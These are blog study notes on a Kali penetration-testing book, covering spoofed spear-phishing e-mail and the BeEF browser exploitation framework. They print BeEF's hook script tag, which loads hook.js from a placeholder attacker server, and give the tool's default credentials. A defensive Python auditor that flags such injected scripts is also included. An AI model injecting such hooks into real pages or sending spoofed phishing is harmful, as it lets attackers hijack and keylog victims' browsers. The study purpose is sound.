Notes on Web Penetration Testing with Kali (Part 9)

2016-06-12 01:02

Exploiting the Client Using Attack Frameworks

Spear-phishing e-mail attack: Choosing your own mail server has one distinct advantage: it allows you to spoof an e-mail address and, if the victim's mail server does not perform reverse DNS lookups, the e-mail is sure to hit the victim's mailbox.

Metasploit browser exploit

Browser Exploitation Framework (BeEF): in addition to exploiting XSS flaws, the tool can also make web browsers attack other websites using injected JavaScript.

The BeEF attack platform can generate and deliver payloads directly to the target web browser. What makes it an attractive tool for social engineering attacks is its different types of modules and its ability to control many web browsers at the same time using something known as a hook.

BeEF consists of two major components:

A server application that manages the hooked clients, also known as zombies.

A JavaScript hook that runs in the web browser of the victim.

An example of a hook is shown in the following code. This code is injected into an HTML file that is downloaded by the web browser:
<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js"></script>
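
Seen from the defender's side, the hook tag above is something that can be searched for in the pages a site serves. The following is an added example (not part of the original notes and not BeEF's own code) that audits an HTML document for script tags loading from hosts outside an allowlist or matching the hook URL shape shown above; the allowlist hosts, function names and sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the site's own list of hosts allowed to serve scripts.
ALLOWED_SCRIPT_HOSTS = {"www.example.test", "cdn.example.test"}
BEEF_DEFAULT_PORT = 3000        # port used in the hook URL above
BEEF_HOOK_PATH = "/hook.js"     # path used in the hook URL above


class ScriptSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def audit_scripts(html, page_host):
    """Return (src, reasons) for each script that looks like an injected hook."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urlsplit(src)
        host = url.hostname or page_host   # relative URL: same host as page
        reasons = []
        if host not in ALLOWED_SCRIPT_HOSTS:
            reasons.append("host not on script allowlist")
        if url.port == BEEF_DEFAULT_PORT:
            reasons.append("BeEF default port 3000")
        if url.path.lower().endswith(BEEF_HOOK_PATH):
            reasons.append("path ends in /hook.js")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample page: one legitimate script, one injected hook.
SAMPLE = """<html><body>
<script src="https://cdn.example.test/app.js"></script>
<script type="text/javascript" src="http://192.0.2.10:3000/hook.js"></script>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in audit_scripts(SAMPLE, "www.example.test"):
        print(src, "->", ", ".join(reasons))
```

The port and file name are only BeEF's defaults and can be changed in its configuration, so the allowlist check is the signal to rely on; the other two reasons only help triage.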


The default username and password for logging in to the web interface are both beef.

Some of the features and uses of the BeEF tool are listed as follows:

Port scanner

Key logger

Browser information gathering

Bind shell

Network mapping

Metasploit integration